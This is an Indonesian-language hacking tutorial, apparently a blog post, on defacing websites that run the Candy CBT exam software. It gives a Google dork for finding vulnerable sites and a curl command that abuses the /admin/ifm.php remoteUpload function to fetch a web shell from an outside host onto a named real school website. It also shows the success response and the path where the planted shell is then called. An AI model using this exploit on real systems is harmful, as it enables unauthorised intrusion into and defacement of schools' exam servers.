Deface Poc Candy CBT v2.7.0 r0 With Termux / Curl

Kali ini mimin akan membahas mengenai Deface yang sebenarnya sudah banyak dilakukan oleh banyak kalangan Hacker, salah satu nya yang akan kita bahas kali ini adalah Deface Poc Candy CBT v2.7.0 r0 With Termux / Curl, Teknik deface ini juga work di versi 2.7.0 r0 ke bawah Sebelum Kita bahas dulu apa itu Candy CBT Candy CBT adalah salah satu aplikasi atau software ujian berbasis komputer yang dilakukan secara daring dan kini mulai banyak digunakan oleh berbagai instansi pendidikan karena fitur dan kegunaannya. Satu hal yang membuatnya lebih menarik, Candy CBT termasuk aplikasi open source yang memungkinkan pengguna untuk mengunduh secara gratis dan memodifikasinya sesuai keperluan Teknik Deface Dork "Support By Candy CBT v2.7.0 r0" ( kembangin lagi make otak wibu kalian ) Shell Raw Termux Download Exploit Vulnability /admin/ifm.php Exploit Shell /files/shell.php Step 1 Lakukan dorking di google untuk mencari website yang menurut anda vuln, Ciri² website vuln ketika kita memasukkan exploit /admin/ifm.php maka web tersebut akan menuju ke halaman login admin. Contoh web : https://smkpgricokro-bwi.sch.id/cbt/admin/ifm.php Step 2 Buka termux anda dan masukan perintah di bawah ini ; curl https://smkpgricokro-bwi.sch.id/cbt/admin/ifm.php -d 'api=remoteUpload&dir=&filename=shell.php&method=curl&url=http://dhen-bhocil.my.id/tools/shell/byp.txt' {"status":"OK","message":"File successfully uploaded."} Step 3 lakukan exploitasi untuk memanggil shell yang sudah kita upload - Contoh web : https://smkpgricokro-bwi.sch.id/cbt/files/shell.php